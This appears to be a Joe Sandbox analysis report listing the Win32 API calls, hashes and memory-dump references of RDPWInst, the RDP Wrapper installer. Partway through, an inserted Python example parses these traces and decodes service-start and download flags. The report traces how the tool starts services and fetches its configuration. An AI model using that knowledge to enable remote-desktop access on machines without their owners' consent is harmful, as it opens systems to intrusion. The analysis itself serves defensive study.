                                                                                • Instruction Fuzzy Hash: 8DE0ECA1B003008ADF64FF7684C4A12B6D86F48304B48D4BAB808DE14BDA3CD4109725
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438B85
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID:
                                                                                • API String ID: 71445658-0
                                                                                • Opcode ID: a46219772db8ce53a9de16e33fdee055c61f0647121e37f1090d2be0f08d93d7
                                                                                • Instruction ID: 89278caf5ef83198d89b8dc4a9c9fb76eb3a10e2e46a05883e0df08903897f1a
                                                                                • Opcode Fuzzy Hash: a46219772db8ce53a9de16e33fdee055c61f0647121e37f1090d2be0f08d93d7
                                                                                • Instruction Fuzzy Hash: C921D370B04344AFDB11EB65C842B9EF7F99B48304F2144BEB804E3282DA7C9E059758
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 004083CE
                                                                                  • Part of subcall function 0040920C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409248
                                                                                  • Part of subcall function 0040920C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409299
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileModuleName$LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 4113206344-0
                                                                                • Opcode ID: cbb02fdfb2fa808f830c388f18c69e1a99260115120f30c524f5d5f327a3d354
                                                                                • Instruction ID: 90d1829834ce79f86c13b7573f8e9a8c333b05ddd33e28dd31ebb7d28ab9999b
                                                                                • Opcode Fuzzy Hash: cbb02fdfb2fa808f830c388f18c69e1a99260115120f30c524f5d5f327a3d354
                                                                                • Instruction Fuzzy Hash: 84E0C9B1A003109BCB10DE58C9C5A477798AB48764F044AAAED64EF387D775DD1087D5
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,C0000000,?,00000000,00000002,00000080,00000000,?,?,004257A8,0042F5F0,00000000,0042F6D7,?,?,004257A8), ref: 0040F68A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 09450458b8d81176c6a50bac5932f2701a5404c96287c680bb229262f5fe89b5
                                                                                • Instruction ID: 32e31081b98e7b24079041a639207f5f8240b3ca2c27c4b0157ee02f81a1b514
                                                                                • Opcode Fuzzy Hash: 09450458b8d81176c6a50bac5932f2701a5404c96287c680bb229262f5fe89b5
                                                                                • Instruction Fuzzy Hash: 99E0C2A3B4072036F63072AD4C82FAB9158CB867B4F470336FA50FB2D2C0999C0241AC
                                                                                APIs
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040F6D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: 8e9fea90e53bca7412c33d02f8e097722a35645c54a93293cf713adbfc77c375
                                                                                • Instruction ID: 3fe4e569543b3f1381ab86603454923b4de8c4718f21568c98d02def12c07fd2
                                                                                • Opcode Fuzzy Hash: 8e9fea90e53bca7412c33d02f8e097722a35645c54a93293cf713adbfc77c375
                                                                                • Instruction Fuzzy Hash: 42D05BB63082507AD220D55B5C44DAB6BDCDBC5771F10063FB658C31C0D6308C05C275
                                                                                APIs
                                                                                • GetNativeSystemInfo.KERNEL32 ref: 0043A648
                                                                                Similarity
                                                                                • API ID: InfoNativeSystem
                                                                                • String ID:
                                                                                • API String ID: 1721193555-0
                                                                                • Opcode ID: f537996a7b7980d49ed43dd1d2441830a107cc63a0e7000c4f47f7a03b218ad6
                                                                                • Instruction ID: fbf5644ea725b9a19c2d11835783dba3dfebd9b236010a27cc61b97838af9c82
                                                                                • Opcode Fuzzy Hash: f537996a7b7980d49ed43dd1d2441830a107cc63a0e7000c4f47f7a03b218ad6
                                                                                • Instruction Fuzzy Hash: 66E086584BC14148C60523354C2F7A32688832A324F4D2923C4D985262E25FC0B77BAF
                                                                                APIs
                                                                                • GetFileAttributesW.KERNEL32(00000000,00447324,0043D137,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F7CF
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: b551f2b18252a583477f9e8ccff1f7da88027c1fc4d2758f3b89c6edbf41f201
                                                                                • Instruction ID: dfbd20c989cc919aa742ea809a195094cafabb968b5a4f056a7cb7a67f60922a
                                                                                • Opcode Fuzzy Hash: b551f2b18252a583477f9e8ccff1f7da88027c1fc4d2758f3b89c6edbf41f201
                                                                                • Instruction Fuzzy Hash: F3C08CA03012000AEE30B1BD1DCA80B02884A0D2383A02A37F069F3AD3D23E886F201A
                                                                                APIs
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000001,0040F8C6,00000000,0040F8EB,?,00447324,00000000,00000000,00000000,00000000,?,0043D15F,00000000,0043D55E), ref: 0040FB69
                                                                                Similarity
                                                                                • API ID: CreateDirectory
                                                                                • String ID:
                                                                                • API String ID: 4241100979-0
                                                                                • Opcode ID: 93014c2a0d15a9f7c19c06a67ffa09c9f03b47d74489f26678219aaa478409b4
                                                                                • Instruction ID: 5428b92e23564d17d1f876684be8f9c2b3243abbeaf0de8523baba27188e832a
                                                                                • Opcode Fuzzy Hash: 93014c2a0d15a9f7c19c06a67ffa09c9f03b47d74489f26678219aaa478409b4
                                                                                • Instruction Fuzzy Hash: 40B092927543401AEA0035FA0CC6F2A418CD70960AF110C3ABA42E7183D47FC8290026
                                                                                APIs
                                                                                • lstrcpynW.KERNEL32(?,00000000,?,00000000,004093AD,?,?,?,00000000), ref: 0040937A
                                                                                Similarity
                                                                                • API ID: lstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 97706510-0
                                                                                • Opcode ID: f92199f7e57e2128dd250d54d35a9e3758d953fbac64912c85fa78ba761ebe9f
                                                                                • Instruction ID: 1f383253a52e48d77bc15eb4822a33d834d352bf49a326ca98ed7cc47a11fc89
                                                                                • Opcode Fuzzy Hash: f92199f7e57e2128dd250d54d35a9e3758d953fbac64912c85fa78ba761ebe9f
                                                                                • Instruction Fuzzy Hash: 0111C671504204EFDF21DB69CC86B9A77F8EB19754F5100BAFC40AB2D2D7B8AD008A19
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00402AE3
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00402B06
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00402B13
                                                                                Similarity
                                                                                • API ID: Virtual$Free$Query
                                                                                • String ID:
                                                                                • API String ID: 778034434-0
                                                                                • Opcode ID: d2902ee949b2c85551e00087902fb7701d80a0372c0c987194a01e681a746040
                                                                                • Instruction ID: e8ddcf902efd7f78c833b1da2340b8221ccc6e4d64c13544335dcfda98f803ee
                                                                                • Opcode Fuzzy Hash: d2902ee949b2c85551e00087902fb7701d80a0372c0c987194a01e681a746040
                                                                                • Instruction Fuzzy Hash: 0CF06D343046005FD311CB19CA89B17BBE5EFC9350F15C17AE988973E5E675DC019B9A
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5EA
                                                                                • GetLastError.KERNEL32(?,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5F9
                                                                                  • Part of subcall function 0043B48C: CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4BC
                                                                                  • Part of subcall function 0043B48C: CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4D1
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B61F
                                                                                • GetLastError.KERNEL32(?,00000000,00000000,00000010,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B62E
                                                                                Similarity
                                                                                • API ID: Service$CloseErrorHandleLastOpen$Manager
                                                                                • String ID: $sD$...$OpenSCManager$OpenService$ServicesActive$StartService$[*] Starting
                                                                                • API String ID: 2257214823-3855835416
                                                                                • Opcode ID: 55f0df0e7310880f6e7cb70b762c89182bbbe75636a3247ae01688996091d268
                                                                                • Instruction ID: 0e693e6e1cec2ac2fe46a8ff9d209bc722a6061919d6bcedfcc5fc96e321ed9b
                                                                                • Opcode Fuzzy Hash: 55f0df0e7310880f6e7cb70b762c89182bbbe75636a3247ae01688996091d268
                                                                                • Instruction Fuzzy Hash: 6C313471A04208AEDB10FBB68842B5F77E8DB4C715F60947BF614E7283DB7C9940869E
                                                                                APIs
                                                                                • InternetOpenW.WININET(RDP Wrapper Update,00000000,00000000,00000000,00000000), ref: 0043CF9B
                                                                                • InternetOpenUrlW.WININET(00000000,https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini,00000000,00000000,80000000,00000000), ref: 0043CFB7
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0043CFC3
                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0043CFDB
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0043D002
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0043D008
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandle$Open$FileRead
                                                                                • String ID: $sD$RDP Wrapper Update$https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
                                                                                • API String ID: 4294395943-3115740878
                                                                                • Opcode ID: 0dd60196e7cab0bfb1fb3172ef56b337b41d75a0cde3163acb5471a059a842a1
                                                                                • Instruction ID: c5d90ac50beae541ecf0d1101a3828864360ef58c633fc88e2a86ac238cf1af1
                                                                                • Opcode Fuzzy Hash: 0dd60196e7cab0bfb1fb3172ef56b337b41d75a0cde3163acb5471a059a842a1
                                                                                • Instruction Fuzzy Hash: B611EC30A40204BAE725DB629C52F5E73B99B5CB08F21907AF500B61C1DAFC6D15965E
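The two function entries above record how the dropped RDPWInst component talks to the Service Control Manager (OpenSCManagerW on the "ServicesActive" database, then OpenServiceW, with "StartService" among the referenced strings) and how it fetches rdpwrap.ini from raw.githubusercontent.com over WinINet. The Python below is an added example, not code from this Joe Sandbox report or from the RDP Wrapper project: it parses API bullet lines in the report's own format, maps the leading arguments onto parameter names taken from the Win32 SDK prototypes (an assumption; Joe Sandbox prints stack contents past the real parameters, which the parser ignores), decodes the access masks and flags that occur here against their documented values (SC_MANAGER_CONNECT, SERVICE_START, INTERNET_FLAG_RELOAD), and extracts network indicators. The sample lines are copied verbatim from the two entries.

```python
"""Parse Joe Sandbox 'APIs' bullet lines into structured Win32 calls, decode the
access masks and flags seen in the RDPWInst entries, and pull network indicators.
Added example; not code from the report or from RDP Wrapper."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: API bullet lines copied from the two function entries
# above (service-control sequence and the rdpwrap.ini download).
SAMPLE_LINES = """\
• OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5EA
• GetLastError.KERNEL32(?,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5F9
  • Part of subcall function 0043B48C: CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4BC
• OpenServiceW.ADVAPI32(00000000,00000000,00000010,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B61F
• InternetOpenW.WININET(RDP Wrapper Update,00000000,00000000,00000000,00000000), ref: 0043CF9B
• InternetOpenUrlW.WININET(00000000,https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini,00000000,00000000,80000000,00000000), ref: 0043CFB7
• InternetReadFile.WININET(00000000,?,00000400,?), ref: 0043CFDB
"""

# One report line: optional "Part of subcall function XXXX:" prefix, then
# Api.MODULE(arg,arg,...), ref: ADDR
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
HEX32 = re.compile(r"[0-9A-F]{8}")

# Assumed parameter names (Win32 SDK prototypes). Joe Sandbox prints stack words
# beyond the real parameters, so only the first len(names) arguments are mapped.
PROTOTYPES = {
    "OpenSCManagerW": ("lpMachineName", "lpDatabaseName", "dwDesiredAccess"),
    "OpenServiceW": ("hSCManager", "lpServiceName", "dwDesiredAccess"),
    "InternetOpenW": ("lpszAgent", "dwAccessType", "lpszProxy", "lpszProxyBypass", "dwFlags"),
    "InternetOpenUrlW": ("hInternet", "lpszUrl", "lpszHeaders", "dwHeadersLength", "dwFlags", "dwContext"),
    "InternetReadFile": ("hFile", "lpBuffer", "dwNumberOfBytesToRead", "lpdwNumberOfBytesRead"),
}

# Documented bit values for the masks that occur in this sample (winsvc.h, wininet.h).
FLAG_BITS = {
    ("OpenSCManagerW", "dwDesiredAccess"): {0x0001: "SC_MANAGER_CONNECT"},
    ("OpenServiceW", "dwDesiredAccess"): {0x0010: "SERVICE_START", 0x0020: "SERVICE_STOP"},
    ("InternetOpenUrlW", "dwFlags"): {0x80000000: "INTERNET_FLAG_RELOAD"},
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None  # address of the subcall the line belongs to

    def params(self) -> Dict[str, str]:
        """Map leading arguments onto the assumed prototype; {} for unknown APIs."""
        return dict(zip(PROTOTYPES.get(self.api, ()), self.args))


def parse_calls(text: str) -> List[ApiCall]:
    """Parse every API bullet line; lines that are not calls are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
    return calls


def decode_flags(api: str, param: str, value: str) -> Optional[List[str]]:
    """Name the bits of a hex mask; unknown bits are kept as hex. Returns None
    when the parameter has no table or the value is not a 32-bit literal ('?')."""
    table = FLAG_BITS.get((api, param))
    if table is None or not HEX32.fullmatch(value):
        return None
    mask, names = int(value, 16), []
    for bit, label in table.items():
        if mask & bit:
            names.append(label)
            mask &= ~bit
    if mask:
        names.append(f"0x{mask:08X}")
    return names


def extract_urls(calls: List[ApiCall]) -> List[str]:
    """Network indicators: any argument that is an http(s) URL."""
    return [a for c in calls for a in c.args if a.startswith(("http://", "https://"))]


def service_start_requested(calls: List[ApiCall]) -> bool:
    """True when the trace connects to the SCM and opens a service with SERVICE_START."""
    connected = any(c.api == "OpenSCManagerW" for c in calls)
    for c in calls:
        if c.api == "OpenServiceW":
            bits = decode_flags(c.api, "dwDesiredAccess", c.params().get("dwDesiredAccess", "")) or []
            if connected and "SERVICE_START" in bits:
                return True
    return False


if __name__ == "__main__":
    parsed = parse_calls(SAMPLE_LINES)
    for c in parsed:
        decoded = {k: (decode_flags(c.api, k, v) or v) for k, v in c.params().items()}
        print(f"{c.api}.{c.module} @ {c.ref}: {decoded}")
    print("URLs:", extract_urls(parsed))
    print("SERVICE_START requested:", service_start_requested(parsed))
```

Two caveats when reading the decoded output against the entries above: the lpServiceName argument of OpenServiceW is printed as 00000000 in the dump, so the service name is not recoverable from this excerpt (the "StartService" string only shows what the function intends to do next), and INTERNET_FLAG_RELOAD on the InternetOpenUrlW call means the file is fetched from the origin server rather than the WinINet cache, which is why the request is visible as live traffic to raw.githubusercontent.com.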
                                                                                APIs
                                                                                • lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408E8B
                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408E9E
                                                                                • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408EB4
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408EC0
                                                                                • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?), ref: 00408EFC
                                                                                • lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?), ref: 00408F08
                                                                                • lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 00408F2B
                                                                                Similarity
                                                                                • API ID: lstrcpyn$Findlstrlen$CloseFileFirst
                                                                                • String ID: \
                                                                                • API String ID: 426534248-2967466578
                                                                                • Opcode ID: c2c22b4f6afaac3322ec1ba7b89a81b7c1940998765c8b0d5641ec05d20bdfa1
                                                                                • Instruction ID: b362d454dc0c99aa6135db0f351dbab6b5904c2f5f97e8c1ae29e40b3cae7ae2
                                                                                • Opcode Fuzzy Hash: c2c22b4f6afaac3322ec1ba7b89a81b7c1940998765c8b0d5641ec05d20bdfa1
                                                                                • Instruction Fuzzy Hash: 2921DA72A005195BCB10EAA4CD89BEF736DEB84314F0845BBA554E32C1EA7CEA458B58
                                                                                APIs
                                                                                • IsValidLocale.KERNEL32(?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089B4
                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089D0
                                                                                • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089E1
                                                                                Similarity
                                                                                • API ID: Locale$Info$Valid
                                                                                • String ID:
                                                                                • API String ID: 1826331170-0
                                                                                • Opcode ID: 22c6a01b53f4869b0805d6a69e827c795f3fdd97ab41ae37c19bcf7436934d77
                                                                                • Instruction ID: a5145651339b4fb3455c536bf826b1f6d015bb6bedb64d7d22cca76e959b3329
                                                                                • Opcode Fuzzy Hash: 22c6a01b53f4869b0805d6a69e827c795f3fdd97ab41ae37c19bcf7436934d77
                                                                                • Instruction Fuzzy Hash: 4031C274A00618ABDF20EB55DD81BAF77B5EB44700F1040BBA588B72D1DA7D5E40CF5A
                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(?,00443136,00000000,0044315A), ref: 004146A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Version
                                                                                • String ID: 8[D
                                                                                • API String ID: 1889659487-4257705004
                                                                                • Opcode ID: 4c73b04ee2d3421a5135ac7becaf35c551135d218803d44854ea7cc165e5ef2a
                                                                                • Instruction ID: 2f0940f951a798b0a8c1b92e6229d48fd5c0b6d32f60b1d075f360ba34157daa
                                                                                • Opcode Fuzzy Hash: 4c73b04ee2d3421a5135ac7becaf35c551135d218803d44854ea7cc165e5ef2a
                                                                                • Instruction Fuzzy Hash: 7DF030B8605B419FDB00DF18E845659B7E0EB89314F00483AF485D7391D738A844CB6E
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,?,0040F7B7,00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000), ref: 0040F757
                                                                                • FindClose.KERNEL32(00000000,00000000,?,00000000,?,0040F7B7,00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000), ref: 0040F762
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                • Opcode ID: 8349d8abcabe035f766b9fd57bf523843a29f3c72d549b36151af9bdffc9284f
                                                                                • Instruction ID: 44d6f2536772e544dca19d4554f13a915e571bc99722c0a0b507a91726501656
                                                                                • Opcode Fuzzy Hash: 8349d8abcabe035f766b9fd57bf523843a29f3c72d549b36151af9bdffc9284f
                                                                                • Instruction Fuzzy Hash: B9E0CD6261470815C72065B90CC9B5B728C5B04328F040BB77D5CF35D2FA3D8554115F
                                                                                APIs
                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 0040FB09
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DiskFreeSpace
                                                                                • String ID:
                                                                                • API String ID: 1705453755-0
                                                                                • Opcode ID: 061f37ac546520710da28799b67137028b65efc101c0d4d81ccfdcd92c7e26f4
                                                                                • Instruction ID: 58712635a06311b99fbeb36610203dfa2cb34c225fc8d295b9fe620e031658d4
                                                                                • Opcode Fuzzy Hash: 061f37ac546520710da28799b67137028b65efc101c0d4d81ccfdcd92c7e26f4
                                                                                • Instruction Fuzzy Hash: DC1112B5E00209AFDB04CF99C881DAFF7F9EFC8304B14C569A508E7254E6319A018B90
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
